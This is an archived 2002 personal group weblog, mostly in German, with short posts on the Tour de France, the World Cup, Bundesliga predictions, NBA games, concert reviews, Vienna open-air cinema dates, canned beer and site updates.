    falls er wirklich spekuliert hat, könnte sich das in den nächsten tagen noch als grosser fehler erweisen, denn die teams von kelme (botero und sevilla) aber vor allem once (beloki, olano und gonzalez de galdeano) werden seinem team us-postal mit jeweils mindestens 2 bergspezialisten in den nächsten tagen in den pyrenäen und danach in den alpen ordentlich um die ohren fahren.
    schon am donnerstag kommt es zu einer ersten heftigen bergetappe.
    endgültig entschieden wird die tour aber wohl spätestens mitte nächster woche (mittwoch und donnerstag).
    jedenfalls scheint uns heuer wirklich eine spannende entscheidung bevorzustehen und im endeffekt wird wohl mr. armstrong eh wieder gewinnen. aber bis dahin kommt bestimmt noch viel arbeit auf ihn, heras und co zu...
    graturliere zu dieser aussagekräftigen studie  romario11  14.07.2002 13:03:35

    Mac-User haben eine bessere Bildung und verdienen mehr Geld als Nutzer von PCs, das will Nielsen/NetRatings in seiner neuen Studie ermittelt haben.

    Während 70 Prozent der Mac-User einen College-Abschluss besitzen, sind es bei den PC-Usern nur 54 Prozent.

    tolle aussage... da haben wohl von Nielsen/NetRatings selbst ein paar einen mac am schreibtisch stehen. dass von den 4% computer usern, die einen mac haben, die meisten besser gestellt sind als die mehrheit der 96% pc user, ist wohl nicht die aufsehenerregendste erkenntnis. das liegt schon daran, dass die berufsgruppen, die macs benutzen (müssen) von vorne herein eine höhere ausbildung hinter sich haben, um den jeweiligen beruf ausüben zu können.

    was meint die gemeinde?

    :: INCREDIBLE 40 YEARS  bully  07.12.2002 12:22:24

    12. 7. 1962, Marquee Club London:
    Es kommt zum ersten Live-Auftritt einer jungen Londoner Rockband:
    THE ROLLING STONES
    Ich gratuliere hiermit den Stones (eigentlich ja "nurmehr" Mick und Keith) ganz herzlich zum 40-jährigen Bühnenjubiläum!!!
    So ein, zwei Jahrzehnte sollten sich schon noch ausgehn, oder guys? ;-)))
    :: feelocopa 2002  sTe  07.12.2002 11:32:29

    so meine leute: feelocopa sperrt die pforten !!! wiedereroeffnung gibts mitte august rechtzeitig zur champions league !!!
    wer lust hat kann sich das komplette feelocopa-messageboard als pdf downloaden
    :: INSOMNIA ::  bully  07.10.2002 06:04:47
    Insomnia...?
    30 simple tips to help you get to sleep
    some good advice, some stupid ones...
    I HATE WARM MILK!!!
    Dot-Com Shutdown Pace Slows  sTe  07.06.2002 18:55:23
    In a sign that the Internet sector may be nearing the end of its brutal shakeout, the number of shutdowns and bankruptcies by dot-com companies in the first half of this year fell 73% from the same period last year, a new report from Webmergers.com shows.
    At least 93 Internet companies closed their doors or filed for bankruptcy protection in the first six months of 2002, down from 345 such casualties during the same period last year, according to the San Francisco research firm that has been keeping a tally of shutdowns.

    June, which had 13 shutdowns, marked the sixth consecutive month in which the number of shutdowns came in at less than 20. That´s a considerable contrast from the 16-month period beginning the preceding January, when casualties averaged 44 a month.

    Since January 2000, when the Internet froth was at its peak, at least 862 dot-com companies have failed, according to Webmergers.com data.
    (full article)
    :: independance day  sTe  07.06.2002 18:46:19
    America´s Army is here for free download...;
    fuer die, die noch nichts davon gehoert haben: es handelt sich um den 1st person shooter der us army...
    feelospophee ladet gerade und wird seine review in baelde abliefern; in der zwischenzeit verweise ich auf gamespot.
    :: OPEN AIR, YEAH ::  bully  07.05.2002 19:43:52
    Und wieder ist es soweit: die Open Air - Saison hat begonnen!!!
    Hier nun ein paar Highlights aus dem aktuellen Sommerprogramm in Wien:

    So, 07.7.: Apocalypse Now - KR
    Mi, 10.7.: Ice Age - KR
    Fr, 12.7.: American Beauty - KR
    So, 14.7.: Strange Days OF - AG
    Mo, 15.7.: Tschaikowsky: Der Nussknacker - RP
    Do, 18.7.: A Bout de Souffle OmU - AG
    Do, 18.7.: Being John Malkovich - KR
    Fr, 19.7.: Offenbach: Orpheus in der Unterwelt - RP
    Mi, 24.7.: J. Strauss: Eine Nacht in Venedig - RP
    Do, 25.7.: 2001: A Space Odyssey OF - AG
    Mi, 31.7.: Almost Famous - KR
    Do, 01.8.: Puccini: Madame Butterfly - RP
    Fr, 02.8.: Buena Vista Social Club - KR
    Fr, 02.8.: Fargo OmU - AG
    Sa, 03.8.: Das Boot, Directors Cut - KR
    Sa, 03.8.: Dr. Strangelove or How I Learned to Stop Worrying and Love the Bomb OF - AG
    So, 04.8.: Bad Lieutenant OmU - AG
    Mi, 07.8.: Verdi: Macbeth - RP
    Mi, 07.8.: 8 1/2 - AG
    Fr, 09.8.: Gladiator - KR
    Fr, 09.8.: The Man Who Fell To Earth - AG
    Sa, 10.8.: Chocolat - KR
    Sa, 10.8.: Rossini: La Cenerentola - RP
    Fr, 16.8.: Elvis - Live in Las Vegas 1970 - KR
    Sa, 17.8.: My Own Private Idaho OmU - AG
    Mo, 19.8.: Lehár: Land des Lächelns - RP
    Fr, 23.8.: Mozart: Figaros Hochzeit - RP
    Sa, 24.8.: Das Leben ist schön - KR
    So, 01.9.: Verdi: Don Carlos - RP

    AG = Augarten Beginn: 21.30Uhr
    KR = Krieau Beginn: 21.00 Uhr
    RP = Rathausplatz Beginn: bei Einbruch der Dunkelheit

    AG und KR kosten je Euro 7,50; Veranstaltungen am RP sind wie immer gratis.

    Ich wünsch euch allen einen schönen Sommer!!!
    :: FOOTBALL UNLIMITED ::  bully  07.03.2002 18:26:03


    wer von ostasiatischem kauderwelch und dem runden leder noch immer nicht genug hat, bitteschön:
    SONAR CHALLENGE
    und heut in einer woche fängt ja eh die bundesliga wieder an ;-))))
    :: Happy Birthday, Canada  bully  07.01.2002 20:21:42
    Heute vor 135 Jahren wurde Canada die Selbstverwaltung zugesichert. Nähere Infos zum Canada Day sowie die Hymne gibts hier.
    ;-)))
    :: interesting?  sTe  27.06.2002 22:05:46
    ´World’s oldest photo analyzed´; fraegt sich nur was interessanter ist; der artikel selbst, oder all das umgebende product-placement...
    :: highlight!!!  sTe  26.06.2002 02:11:25
    auch wenn dieser topic eigentlich un die mXc section gehoert:
    soeben ist die neue Red Hot Chillies eingetroffen!!!
    wo californication aufhoert, setzt das scheiberl nahtlos einen drauf , und das mit noch mehr gefuehl !!! feelosophee ist begeistert, begeistert ,.....begeistert !!!


    favourite is -minor thing-
    :: soccer free days  sTe  19.06.2002 16:42:32



    so erleben wir im office die finalphase der WM...
    fidels juengstes interesse gilt blumen:  babsi  17.06.2002 22:56:57
    roten nelken des sozialismus!
    allen jenen die sich heute vielleicht über das weiterkommen der usa bei der fussball-wm geärgert haben, wäre bei dieser gelegenheit gleich die offizielle kubanische homepage ans herz zu legen - gleich auf der startseite wird eifrig stimmung gegen uncle sam gemacht!
    :: der eingeschäumte pc...  bully  13.06.2002 19:12:42

    vor einiger zeit haben wir hier mal verschiedene cases und designs von pcs analysiert.
    der hier vorgestellte pc kommt ganz ohne gehäuse aus, hat aber trotzdem einen henkel und ist scheinbar auch recht mobil ;-)
    :: music  sTe  13.06.2002 11:51:42
    Ausgezeichneter Artikel über den Umbruch, in dem sich die Musikindustrie gerade befindet.

    interessant sind auch diese plaene von KaZaa...
    :: gaming...  sTe  06.12.2002 10:45:28
    finally, after 4 month heavy coding, the latest nofrontiere project has gone online: Casinos Austria!!!
    :: worst ad campaign  sTe  06.10.2002 17:26:37
    ...gestern hab ich nach langer zeit wieder das wort ´dillo´ gehoehrt,...
    warum muss ich das in diesem zusammenhang sofort wieder assoziiern :)
    top 1000 names of 2001  sTe  06.07.2002 17:15:26

    top names for 2001
    my name´s just at position 730, my girlfriend´s 390, and the winner is by far:
    our daugther at the 77th place !!!
    :: surfin´  sTe  06.06.2002 17:38:45
    excellent for aimless entertainment surfing: the stumbleupon toolbar.

    download the nf communication assistant (c by p.bauer)

    everything you always wanted to know about austria but were afraid to ask...
    :: explore it  sTe  06.06.2002 15:49:06

    explore ist online!!!
    hierbei handelt es sich um keine herkoemmliche corporate site, viel mehr um eine adaption der unternehmensphilosophie; aber man sehe selbst;
    war auf jedenfall ein sehr interessanter job...
    :: IT´S SHOWTIME!!!  bully  06.03.2002 23:22:18

    Nur noch 5 Tage, dann kommt es in der "Pyramid Arena" von Memphis zum unfairsten Kampf der Geschichte.
    Der kanadische Warmduscher und Hinten-Anschnaller Lennox Lewis trifft auf den Vollmann und Beim-Boxkampf-Ohr-Abbeisser Mike Tyson.
    Mein Tipp: Lewis geht in der 8. Runde KO (aber auch nur, damit es sich noch mehr auszahlt so lang wachzubleiben, sonst wärs wohl die 3. Runde ;-) )!
    "Lewis-Tyson ist der Fight, auf den die ganze Welt gewartet hat. Ich bin mir sicher, ich werde mein Erbe zementieren, wenn ich Tyson am 8. Juni erledigt habe", übermittelte Lewis. Tysons Antwort kam postwendend: "Für den 8. Juni garantiere ich, dass ich Lewis ausknocke und wieder Weltmeister werde", versicherte "Iron Mike", der sich vor sechs Jahren zum letzten Mal mit einem WM-Gürtel schmücken konnte.
    Beide Boxer werden wohl mit diesem einen Fight jeweils über 30 Millionen Dollar verdienen. Auch ned schlecht...
    Zum wahren Boxkampf (und nicht nur Show-Event) aber soll es dann im September kommen, wenn Vitali Klitschko gegen den Sieger des Lewis – Tyson – Kampf (also Tyson) um die WM-Gürtel der Verbände IBF und WBF kämpfen wird. Hoffe ich zumindest...
    Oder wird es etwa einen Rückkampf geben???
    Das kann doch aber der Lewis seinem Körper nicht antun!!! ;-)
    INCREDIBLE NIGHT  bully  06.03.2002 11:51:01
    Heute Nacht wurde in Sacramento wiedereinmal Sportgeschichte geschrieben!!!
    Kurz die Vorzeichen: NBA Western Conference Finals Sacramento KingsLA Lakers. 3:3 nach sechs Spielen. Um 2.00 Uhr begann das alles entscheidende Spiel 7.
    Es entwickelte sich eine unglaublich spannende Partie. Keine Mannschaft konnte sich jemals um zehn oder mehr Punkte absetzen. Insgesamt gab es in dieser Partie 20 (!!!) Führungswechsel und 15 Unentschieden. Entstand nach der regulären Spielzeit: 100 – 100!!! Die erste Verlängerung in einem Spiel 7 in einem Conference oder NBA Finale aller Zeiten!!!
    In dieser aber waren Kobe und Shaq leider nicht mehr zu stoppen – Endstand (um ca. 4.45 Uhr): 112 – 106. Der erste Auswärtssieg in einem Spiel 7 in einem Conference oder NBA Finale seit 1982 (Philadelphia @ Boston).
    Schade!!!!!
    Möchte mich aber an dieser Stelle noch mal recht herzlich bei Mike Bibby (rechts), Chris Webber, Vlade Divac und allen übrigen Kings für die fantastische Saison, die sie uns geboten haben, bedanken.
    Und jetzt kann ich nur noch hoffen, dass Jason Kidd und seine New Jersey Nets die arroganten Lakers von ihrem hohen Ross stoßen, obwohl die Vorzeichen wohl ganz klar dagegen sprechen :-(( !!!
    Mittwoch Nacht geht’s los!!!!!
    :: 31  sTe  06.02.2002 10:26:53
    as time flies by...
    the older i grow, the more playful the presents seem to become:
    a great carrera racingtrack and the mighty ´fevernova´!
    superb!!!
    also on the list: ´elvis´-playingcards, a book, a dvd, stiegl glasses and a big smile from my daughter!
    THANKS A LOT !!!
    ps: photos are here...
    :: here we go ...  sTe  01.06.2002 02:50:00

    :: wireless  sTe  30.05.2002 12:50:33

    feelosophee´s own pre-birthday present funkt munter drauf los; now also connected in the winter garden...
    quiz  babsi  27.05.2002 15:44:57
    als kleine vorbereitung auf die bevorstehenden spiele!
    :: eminem  sTe  24.05.2002 10:55:51
    "Der amerikanische Rapper Eminem zeigt keine Sympathien für Fans, die sich seine frisch ins Internet geratenen Songs illegal auf ihren Computer laden. Nach Informationen des Musiksenders MTV Asia beschimpfte er solche Anhänger als "kleine dürre Fans", die er gerne einmal treffen und verprügeln würde." ---

    ...und er bleibt einfach dumm und unsympathisch !!! na, der soll mal ruhig in mei gassn kommen...
    :: end of indoor season  sTe  22.05.2002 01:00:35



    und wieder ist eine hallen saison vorbei...
    ab sofort wird wieder unter freiem himmel geprackt!
    :: tribute to jamc  sTe  18.05.2002 17:53:21
    new JAMC compilation is due on 27th of may. incuding two unreleased tracks ...whooowy!

    JAMC began in early 1984 and ended up september 12, 1998; man, they meant a lot to me...
    :: monte ludi  sTe  05.12.2002 20:49:07


    einige nennens schiebung, einige frechheit, ich nenns schlichtweg (groessenwahnsinnige) dummheit;
    auf jedenfall ists ein skandal; marionettendasein statt groesse; (schumacher auch noch in unglaubhaftester opferrolle=unertraeglich!!!),..
    als ob die saison nicht eh schon einseitig genug waere;
    berger nannte es ´kasperltheater´ - dazu faellt feelosophee nur ein: ´petzibaer, der kleine wicht, gewinnt auch heute wieder nicht...´; aber er wird trotzdem genug abcashen...
    sports unlimited...  bully  05.11.2002 23:12:05

    heute, 11. mai 2002: tv-sport ohne ende, aber was kommt jetzt???

    so alle ein, zwei jahre ist es der fall, dass an einem tag diverse sportliche (gross)ereignisse zusammenfallen; heute wars / ists mal wieder so weit.
    hier nur ein kurzer auszug von heute (ungefähr chronologisch), ich weiss schon, dass nicht jeden alles interessiert:
    Formel 1: Qualifying zum Grand Prix von Österreich in Spielberg
    Tennis: Damen-Finale der German Open in Berlin; Henin - Capriati
    Radsport: Prolog zum Giro d´Italia in Groningen
    Eishockey: WM-Finale in Göteborg; Slowakei - Russland
    Fussball: DFB-Pokalfinale in Berlin; Schalke - Bayer
    Basketball: NBA Western Conference Semifinale Spiel 4; Kings - Mavs
    Eishockey: NHL Western Conference Semifinale Spiel 5; Avalanche - Sharks...
    heute in 20 tagen beginnt die fussball-wm, endlich!!!!!!!
    aber was ist bis dahin los?
    sportlose schonkost? topevents? übergangslösungen?
    naja, ein bisschen was von allem; so richtig berauschende 3 wochen werden das passiv-sportlich wohl nicht, aber immerhin:
    natürlich laufen nhl und nba - playoffs und giro noch einige zeit weiter, gut so!!!
    ok, morgen der viel spannung versprechende f1 - grand prix von österreich...
    danach das (für mich vollkommen unwichtige) österreichische pokal-finale...
    und dann??? folgendes:
    14.5. 20.30 uhr: Fussball: Wales - Deutschland in Cardiff (ARD)
    15.5. 20.45 uhr: Fussball: CL-Finale Real - Bayer in Glasgow (ORF, RTL, SPORT1)
    18.5. 19.00 uhr: Fussball: Deutschland - Österreich in Leverkusen (ORF, ZDF)
    18.5. 20.45 uhr: Fussball: Frankreich - Belgien in Paris (EUROSPORT)
    26.5. 14.00 uhr: Formel 1: Grand Prix von Monaco (ORF, RTL, SPORT1)
    is zwar ned wirklich viel, aber besser als nix...
    :: arachnomania  sTe  05.10.2002 20:09:40
    gestern spiderman angeschaut, mit skeptischem auge, und spaetestens ab nach 10 minuten habe mich blendend unterhalten; besser kann man einen comic kaum verfilmen;
    wer batman mag wird vom spiderman begeistert sein;
    leichte kost, liebevoll aufbereitet, jede (haupt)rolle gut besetzt;
    der hype ist somit nicht wie so oft hype-des-willens, sondern vielmehr verdiente gute trash unterhaltung...
    kurze konzertrezension  bully  06.08.2002 01:13:33

    8. Mai, Wien, Pepsi Music Club:
    Bad Religion on Tour!!!
    um ca. 20.15 uhr warma da; sehr erfreut war ich gleich darüber, dass das konzert wie auch letztens das der fun lovin criminals nur im kleinen raum (ca. ein drittel, über die breitseite der halle) stattfinden sollte... hat eine ausgezeichnet atmosphäre!!!
    wir stellen uns also in die erste reihe, direkt an die absperrung, allerdings ganz links (kurzer weg zu bar und toiletten!!!).
    die 2 vorbands waren wirklich nicht erwähnenswert; um 22.10 uhr kommen dann endlich bad religion auf die bühne. full speed gehts los, allerdings war der gesang fast nicht zu hören... nach zwei liedern wirds mir zu blöd:
    bully: hey greg!!! louder!!!!!
    greg: waaas?? lauter?
    bully: the vocals!!!
    greg: oh, just the vocals, i see...
    daraufhin kommt er zu uns her, rückt die boxen, die direkt vor uns auf der bühne stehn und genau auf die band gerichtet sind ein bisschen mehr richtung publikum und von da an ist der sound genial und der abend somit gerettet.
    nach ca. 7 lieder hab ich dann mal wieder meine klappe nicht halten können:
    bully: faaaaaaster!!!!!!!!!
    greg: what?
    bully: pleeeease, faaaster!!!!
    greg: did you hear that? this guy wants us to play it faster, so I think it´s time to make it a little slower, now...
    :-(((
    war aber wohl nur als scherz zu verstehen, ich hab jedenfalls nix gemerkt, dass es langsamer geworden is... :-)
    so nach eineinhalb stunden ging dann auch dieser wunderschöne konzertabend zu ende; hab mir am ende noch die playlist eingnaht (hängt schon im bad!!!) und dann gings ab nach hause.
    scheeee woas!!!!! danke, bad religion!!!!!!!
    :: skull car  sTe  05.08.2002 12:46:10
    scharfes teil die bronze skulptur des spanische künstler miquel barceló...

    :: weekend  sTe  05.05.2002 20:37:12
    vormittag: einen auf gaertner gemacht und alle pflanzen umgetopft. danach das massaker bereinigt;

    nachmittag: fernseher an den tv angeschlossen, kisten geschleppt;

    abend: pasta gekocht dazu einen salcheto, jetzt zieh ich mir seit langer zeit wieder mal drugstore cowboy rein...

    :: feelocopa  sTe  06.03.2002 01:53:30
    bald ists wieder soweit:
    die fussball wm steht vor der tuer! und um den unnaedigen uertragungszeiten zu trotzen gibts feelocopa!
    ist noch in arbeit, aber vorweg mal eine sneak preview...
    :: suchtfaktor hoch  sTe  30.04.2002 11:51:49

    collapse !!!
    good idea!!!!  bully  29.04.2002 17:28:48
    Die britische Regierung hat zur Fußball-Weltmeisterschaft flexible Arbeitszeiten angeregt, damit sich Fußballfans bei wichtigen Spielen nicht krankmelden.
    "Das letzte was ich will ist, dass die gesamte Belegschaft an dem Tag blau macht", sagte Handelsministerin Patricia Hewitt der Zeitung "Sunday Mirror". "Eine gute Lösung ist, die Chefs zu ermutigen, gleitende Arbeitszeiten während der englischen Spiele zu ermöglichen." Jeder zehnte britische Arbeitnehmer will sich einer Umfrage der Zeitung zufolge während des Spitzenspiels zwischen England und Argentinien am 7. Juni krankmelden.
    :: sunday impressions  sTe  28.04.2002 17:39:52

      sTe  24.04.2002 17:25:18
    milksucks.com - ive been off milk for over a year now too... cant say i miss it much...
    :: introducing...  sTe  22.04.2002 15:25:27

    ...the new iToilet
    ::pornolize  sTe  19.04.2002 10:24:46
    using this service feelosophee gets funny contents:
    have a look
    :: t-gigantomanie  sTe  18.04.2002 09:47:11
    ...unglaublich was die an kohle rausbuttern, ob auf kurier, orf, standard, presse, fast ueberall wird man pink penetriert :(
    eigentlich koennte man meinen es waere welt aids tag, aber es ist nur t-mobile day...

    down under, too  bully  17.04.2002 00:38:39
    o tempora, o mores...
    jetzt isses leider auch in australien soweit...
    der peinliche blonde nach dem mann aus dem eis benannte ist die neue nummer 1 der hiesigen single-charts
    :-(
    :: not much news ...  sTe  16.04.2002 13:45:19
    ...these days, because of heavy resettlement...
    remember the days... 20 years ago...  bully  05.12.2002 00:04:52
    nur mal so zur erinnerung;
    die #1-hits der ö3-hitparade 1982:
    Reinhard Fendrich - Schickeria
    Falco - Der Kommissar
    Richard Sanderson - Reality
    Shakin´ Stevens - Oh Julie
    Spider Murphy Gang - Skandal im Sperrbezirk
    Mess - Sonntag
    Nicole - Ein bisschen Frieden
    Trio - Da Da Da
    Reinhard Fendrich - Oben ohne
    Steve Miller Band - Abracadabra
    Andy Borg - Adios Amor
    F.R. David - Words
    Relax - Weil i di mog
    Abba - One of us
    Stevie Wonder & Paul McCartney - Ebony & Ivory
    Survivor - Eye of the Tiger
    Yazoo - Don´t Go

    schon heftig, oder? ;-)
    ::frogs  sTe  04.12.2002 09:52:14
    take a look at the Virtual Frog Dissection;

    search on google/images with keyword feelo :)
    :: road to wc  sTe  04.10.2002 09:05:30
    take a look at this and this...
    i think...  sTe  04.09.2002 12:05:36

    ...i can say that my job is .com-form-table,
    unless i had to to my annual tax declaration yesterday :(

    also saw this movie, which i dont recommend as it is complete pseudo-heroic-bullshit (what did i think ?!?)

    just got an injektion for my back!!!

    today on arte: das leben nach microsoft (20.40)
    Abstiegskampf in Deutschland  bully  04.08.2002 23:40:16
    Da es ja bei uns nurmehr darum geht, ob die Admira oder Tirol absteigt, muss ich mich diesbezüglich ganz auf Deutschland konzentrieren ;-).
    Hier jetzt also nochmal die Ausgangslage 4 Spieltage vor Schluss:

    15. Nürnberg 28P -23 Tore
    ------------------------------
    16. Freiburg 24P -25 Tore
    17. St. Pauli 22P -26Tore
    18. 1.FC Köln 20P -38 Tore


    Die Restprogramme:
    NÜRNBERG:
    13.04. Bayern (H)
    20.04. Schalke (A)
    27.04. Leverkusen (H)
    04.05. St. Pauli (A)
    FREIBURG:
    13.04. 1860 (A)
    21.04. Kaiserslautern (H)
    27.04. Köln (A)
    04.05. HSV (H)
    ST. PAULI:
    13.04. Köln (A)
    19.04. HSV (H)
    27.04. Bremen (A)
    04.05. Nürnberg (H)
    KÖLN:
    13.04. St. Pauli (H)
    20.04. Dortmund (A)
    27.04. Freiburg (H)
    04.05. Cottbus (A)

    Hier nun meine Prognosen:

    Nürnberg verliert alle vier Spiele.
    Freiburg holt vier Punkte; einen gegen den HSV und drei gegen Lautern
    Pauli holt sieben Punkte; einen gegen den HSV im Derby und je drei gegen Köln und Nürnberg
    Köln holt drei Punkte; im Heimspiel gegen Freiburg

    Die Endtabelle wäre demgemäß:

    15. St. Pauli 29P
    -------------------------------
    16. Freiburg 28P
    17. Nürnberg 28P
    18. Köln 23P


    ja, genau so wirds passieren... ;-)
    :: scorpion  sTe  04.04.2002 12:33:22
    ...was nike anlaesslich der wm auffuehrt, ist nicht zu verachten; als beispiel sehe man sich diesen spot an; oder besuche nikefootball.com
    :: site updates  sTe  04.03.2002 14:39:24
    updated styleswitcher in top right corner, providing full user color control; if you get error messages, please delete all your cookies and try again...
    ::1st april  sTe  04.01.2002 16:57:26
    osterbesuch in sbg; mia auf den spuren ihrer vaeterlichen wurzeln; erster kontakt mit der verwandschaft gut ueberstanden;

    und hier sind die ersten photos unseres neuen zuhauses (in 3 wochen ists soweit...)
    ein kurzes PS zu (fast) ganz unten nochmal...  bully  29.03.2002 14:47:36
    HIER nochmal die ungerechtigkeiten der deutschen bundesliga...
    :-(((
    *heul*
    :: pic of the day  sTe  28.03.2002 14:51:48

    dosenbier, die dritte  romario11  28.03.2002 10:47:33
    gestern habe ich den subjektiven geschmackstest für unser geliebtes gold in der dosen durchgeführt. bestnote für geschmack und darbietung. allerdings muss dazu erläutert werden, dass ich den guten gerstensaft zuvor in ein glas umfüllte. ausserdem hatte ich kein vergleichsprodukt zur verfügung, um auf unterschiede eingehen zu können. aber das wird sich bald ändern, nachdem der steve und ich uns schon auf die veranstaltung eines offiziellen objektiven blindtests beim nächsten grösseren zusammentreffen (einweihung?) freuen! resultate gibts dann hier nachzulesen.
    dose die zweite...  sTe  26.03.2002 12:05:31

    cindy´s new commercial
    :: keboard  sTe  26.03.2002 09:39:58
    this projected keyboard by siemens looks quite mind-boggling. imagine having specific key layouts for different applications... especially for games this would rock!
    unser dosenbier!  romario11  24.03.2002 13:36:09
    zuerst war ich ja tief betroffen und schockiert - da gibts unser bestes bier im merkur doch zur abwechslung mal wieder in der verschmähten dosen.

    aber bald wich meine skepsis der begeisterung fürs hervorragend gelungene design. laut stiegl´s homepage nennt sich die aufmachung des ab ende märz 2002 in der halben-dose erhältliche goldbräu "nostalgiedesign". überzeugt euch selbst: man kanns nur entweder hassen oder lieben, ich finde es saugeil, so plakativ gestaltetes dosenbier gabs noch nie. extraklasse. heute steht der geschmackstest an...
    :: 3d  sTe  22.03.2002 14:32:10

    phantastisches 3d pong !!!

    im weblog verzeichnis findet man folgende beschreibung feelosophee`s: "weblog aus der sicht eines job- und freakbedingten users. main topics sind music, programmieren, cyberphilosophy."
    ...naja...
    :: rescue  sTe  21.03.2002 13:23:36
    maec donalds austria zieht ernsthaft in erwaegung den ´hamburger royal ts´ aus der produktpalette zu nehemen; zur zeit laeuft eine umfrageaktion (codename: ´vote for ts´);
    stimmzettel in jeder royal ts packung und auf der maec d. website!!!

    dies ist keine werbung, sondern ein aufruf um mir den meinerseits beliebten burger zu erhalten...
    :: nofro site  sTe  19.03.2002 10:12:09

    after 5 years, the new NOFRONTIERE site is online;
    like it or not, i´m neutral...

    und parallel dazu erorffnet im MAK die nofrontiere ausstellung, naeheres auf der
    (co)operatings system site
    :: photos  sTe  18.03.2002 10:21:00



    wenn der typ nicht aussieht wie unser baric, dann muss ich echt bald wieder mal zum augenarzt...

    added pictures to the mia section, and some pics of the surface mounting @ MAK to the general photo section...
    :: flashface  sTe  15.03.2002 12:20:43

    krasse applikation zum phantombild, aka flashface, selbermachen (aus russland)
    :: tip of the day  sTe  13.03.2002 17:33:40
    parke niemals dein auto auf einer steigung wenn du nur mehr wenig treibstoff im tank hast;
    so geschehn gestern abend in der kirchberggasse...; ein kraeftiges dankeschoen an den netten herrn im gelben auto :)
    :: site updates  sTe  13.03.2002 17:02:27

    changed the design of feelancer;

    added the bookmarklets section; if you don´t know what they are, check this out...
    The Strokes Live (Pepsi Music Hall)  romario11  03.10.2002 19:52:23
    Eins vorweg: es war kein wirklich grossartiges Konzert, aber auch kein ärgerliches.

    Es begann vielversprechend: gerade angekommen, wunderten wir uns gleich über die grosse Zahl an Rockfreunden, welche den Weg in die Pepsi Music Hall gefunden haben. Sicherlich eines der bestbesuchten Konzerte hier im letzten Jahr (but honestly, who the fuck are The Strokes?).

    Im Saal spielte schon die Vorband, Gott sei Dank noch nicht lange, denn es war ein Genuss dem Zweier Francoise Cactus und Brezel Göring, besser bekannt als "Stereo Total" und ihrem frechen Retro-Sound zu lauschen. Da piepste es und kratzte, dass es einem C64 die Schamesröte ins Gesicht treiben würde. Als Sängerin Francoise Stereo Totals bekanntestes take-out "Liebe zu dritt" mit ihrem französchischen Akzent zum Besten gab, überkam mich das aus Funk und Fernsehen bekannte deja-vu, ich musste magisch angezogen an die Bar zum Bierkonsum (Schöfferhofer gabs leider keins). Nach ein paar erfrischenden Songs mehr wurden Stereo Total mit viel Applaus von der Bühne entlassen und der Main Act eingeklatscht.

    Dann waren sie auch schon dar, die gestrigen Hauptdarsteller: The Strokes, die 20jährigen Rotzlöffel aus New York starteten in den Abend mit einem knappen "Hello Everyone" und hauten erst einmal ein paar Songs runter. Dann der nächste Teil audience-communication "Yeah, fuck you too, my friend" offenbar als Replik gedacht. Gegen Ende der Aufführung lies uns Frontman Julian Casablancas noch wissen: "I really appreciate it to be here, even if I look like an asshole, I really do" (You do...).

    Nach ca. 9 Songs und 40 Minuten verabschiedeten sich die Herrschaften mit den Worten "This is the last song, it´s called ´Take it or leave it´ ". Und das wars dann auch tatsächlich schon. Keine Zugabe, 45 Minuten geradliniger, technisch perfekter Rock ´n Roll bei wirklich fantastischem Sound in der Halle. Jedoch klangen alle Songs irgendwie gleich, Status Quo feeling kam auf. Außerdem die Interaktionsverweigerung der gesamten Truppe.

    Ich denke, die Strokes müssen noch ein paar Knödel mehr essen um richtig erwachsen zu werden im Rock Business. Dieses Konzert kann als Talentprobe durchgelassen werden, der Funke sprang aber nicht wirklich über. Zur Schau getragene Rockerarroganz und Durchdreschen des Liedervorrats in einer dreiviertel Stund´ reichen heute nicht mehr aus, um Begeisterungsstürme des Publikums zu wecken.
    :: haderer  sTe  03.08.2002 18:07:53

    MOFF. im Internet -
    ´jawoi´, kann man da nur sagen!!!
    ::dumb  sTe  03.07.2002 09:32:32
    Computer game fan Dan Holmes has changed his name by deed poll to PlayStation2.
    Dan, a bachelor, has £7,000 worth of PlayStation games and plays for around four hours every day.
    He even claims to have asked a few vicars to marry him to his console.
    "None were keen," the 29-year-old mail order manager from Banbury, Oxfordshire, told the Mirror. "So I took its name instead.
    PlayStation2 manufacturers Sony said: "This shows enormous loyalty."
    ein kleines suchspiel...  bully  03.05.2002 19:23:34

    wer findet hier den fehler??? ;-)
    :: ice age  sTe  03.04.2002 16:13:37
    new ice-age trailer (no.3) is out !!!

    Could you describe the last year in 20 words? Really nice project called mayfly...
    :: macho  sTe  03.04.2002 14:59:43
    als alternativprogramm zum ski-weltcupfinale naechstes wochenende: Blondinen-Ski-Weltmeisterschaft...
    tiafes tirol...zz
    FUSSBALL-MAFIA DFB!!!!!  bully  03.03.2002 19:43:59

    SKANDAL IN DER DEUTSCHEN BUNDESLIGA!!!
    ganz eindeutig wurde heute der mannschaft des fc st. pauli von schiedsrichter fröhlich der sieg in dortmund verweigert!!! endstand dieser klar geschobenen partie: 1:1
    ein paar fakten:
    pauli führt 1:0; bei diesem spielstand wird ihnen ein ganz eindeutiger foulelfmeter vorenthalten;
    ebenfalls bei diesem spielstand wird kehl, der schon gelb hatte, bei zwei eindeutigen gelbfouls beide male keine gelb-rote karte gezeigt;
    in der 80. minute wird dem bvb dann noch ein elfmeter für ein foul geschenkt, das ausserhalb des strafraums begangen wurde, dieser bedeutete den ausgleich;
    eine wahre frechheit!!!!!!

    hier noch 2 originalzitate des kommentators auf premiere world:
    „st. pauli hätte hier heute ganz klar drei punkte verdient.“
    „ein dramatisches Spiel mit zwei klaren fehlentscheidungen bei den beiden elfersituationen und diese sind dafür verantwortlich, dass st. pauli heute nur mit einem und nicht mit drei punkten nach hause fährt.“
    skandal ... again!  babsi  03.01.2002 23:50:40
    unglaublich aber wahr, seit heute abend hat oesterreich seine eigene kopie des ohnehin schon lachhaften originals ´enrique iglesias´ - aber das volk hat gewaehlt und einmal mehr ist das ergebnis unbeschreiblich. mit ´say a word´ wird das spanische halbblut im mai einem unschuldigen millionenpublikum, unkoordiniert vor der kamera herumzuckend, drohen, dass er womoeglich naechstes jahr wieder kommt. dass oesterreichs musikinteressierte fuer bluatschink zu ‚flach’ sind, war ja eigentlich zu erwarten.
    :: SKANDAAAAAAAAAL   sTe  27.02.2002 18:25:37
    feelosophee has been stolen, by some korean bastards!!!! goto this site and judge by yourself!
    i´m going to find out who they are and make a bahöööö!!!

    stay tuned...

    nachdem ich dem typen (laut selbstdarstellung ein armer koreanischer student) ein saftiges mail geschickt hab, hat er die site bereits weggenommen und sich unterwuerfigst entschuldigt :) einen screenshot des rips gibts immer noch hier...
    :: link of the day  sTe  27.02.2002 16:16:02
    this must really be a very intelligent person
    (via darkseid)
    Ein bisschen Schadefreude gefällig? ;-)  bully  22.02.2002 10:56:59
